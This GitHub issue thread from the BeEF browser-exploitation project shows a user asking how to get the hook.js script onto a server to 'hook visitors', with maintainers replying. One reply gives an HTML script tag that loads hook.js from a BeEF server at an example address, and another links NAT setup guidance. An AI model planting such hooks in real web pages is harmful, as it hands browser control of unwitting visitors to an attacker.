### ISSUE TITLE
how to get beef working on a server

### ISSUE THREAD

**Issue by gungurbuz** [beefproject/beef#1922]
how am i supposed to get hook.js onto my server so it hooks visitors. sorry if this sounds a bit dumb

**Comment by bcoles** [comment]
The dynamically generated JavaScript hook file `hook.js` is automatically mounted at `/hook.js`.

If your BeEF server is `123.123.123.123:3000` then you can include the script using a HTML `script` tag like so:

```html
<script src="http://123.123.123.123:3000/hook.js"></script>
```

**Comment by gungurbuz** [comment]
thanks for the help. i have another question. How do you get the hook to work outside my LAN? port forwarding? If so, how?

**Comment by bcoles** [comment]
> 
> 
> thanks for the help. i have another question. How do you get the hook to work outside my LAN? port forwarding? If so, how?

https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-on-a-server-behind-nat

**Comment by jackdwalker** [comment]
@gungurbuz how did you go with bcoles advice? Any luck? Let us know if you've hit any further issues.

**Comment by jcrew99** [comment]
I have added the hook answer to the wiki in https://github.com/beefproject/beef/wiki/Configuration
I don't see it anywhere else and i think its very useful for people to see.
@gungurbuz  How did you go? i will close this ticket soon if there is no further issues or comments.

**Comment by gungurbuz** [comment]
i couldnt do anything so i just left the project. I might try again next year or so after my exams

**Comment by gungurbuz** [comment]
also you can close this now
